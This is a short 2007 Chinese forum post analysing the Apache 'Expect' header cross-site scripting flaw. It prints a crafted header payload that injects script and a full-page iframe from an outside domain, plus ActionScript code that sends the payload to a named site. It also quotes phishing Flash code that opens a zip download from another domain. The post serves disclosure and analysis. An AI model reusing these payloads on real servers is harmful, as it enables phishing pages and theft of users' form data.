猪猪 2007-11-10 17:07
Apache "Expect" Header CSS Vulnerability
Apache "Expect" Header Cross-Site Scripting Vulnerability 分析报告
该漏洞利用apache对HTTP头中Expect对象处理的缺陷进行攻击,构造的Expect类似
Expect: FooBar: <script>alert('XSS');</script><iframe src='http://fenggou.net/' width='100%' height='100%' frameborder='0' style='position:absolute; top:0px; left:0px'></iframe>
构造特殊的swf文件,利用as脚本进行HTTP请求
var _l3 = new LoadVars();
_l3.addRequestHeader("Expect:FooBar", "<script>alert(\'XSS\');</script><iframe src=\'http://fenggou.net/\' width=\'100%\' height=\'100%\' frameborder=\'0\' style=\'position:absolute; top:0px; left:0px\'></iframe>");
_l3.decode("Foo=Bar");
_l3.send("http://www.sohu.com/", "", "POST");
......
在朋友的163信箱截获到一封钓鱼邮件,其包括一flash,连接经过加密,解码后如下
[url]http://w6.timshelton.com/loc/al/jane/70930s.swf[/url]
这个是截取的swf钓鱼数据,目前以无法请求该文件
on (press)
{
getURL("https://7we.victorbaez.com/loc/al/jane/GPass.zip", "_blank");
......
由此可见,XSS攻击趋势已经逐步重视FLASH的AS脚本。
当存在缺陷的服务器接受到这个请求的时候就会执行JS代码,可以构造假冒的sohu主页,存放在fenggou.net上,来欺骗用户,获取用户在表单输入的数据。